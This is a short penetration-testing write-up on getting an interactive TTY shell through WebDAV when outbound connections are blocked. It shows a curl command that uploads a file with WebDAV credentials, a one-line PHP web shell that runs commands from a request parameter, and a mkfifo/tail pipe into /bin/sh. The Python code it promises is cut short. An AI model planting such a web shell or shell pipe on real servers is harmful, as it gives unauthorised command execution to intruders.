TTY SHELL FROM ONE LINE OF PHP CODE
we all know how important to gain tty ( teletype terminal ) shell during a penetration testing.
i had a scenario where the vulnerable webdav server is installed in virtualization environment and no routing enabled from the victim box to the outside network or lets say there is outbound firewall and reverse connection denied !!
i was able to upload php shell of oneline using webdav credentials.
curl -vvv --upload-file cmd.php http://example/webdav/cmd.php --user username:passwordcmd.php <?php echo system($_REQUEST['pentest']); ?>
the python code below will take a request command and pipe it and receive the response again in threaded mode
"""mkfifo %s; tail -f %s | /bin/sh 2>&1 > %s"""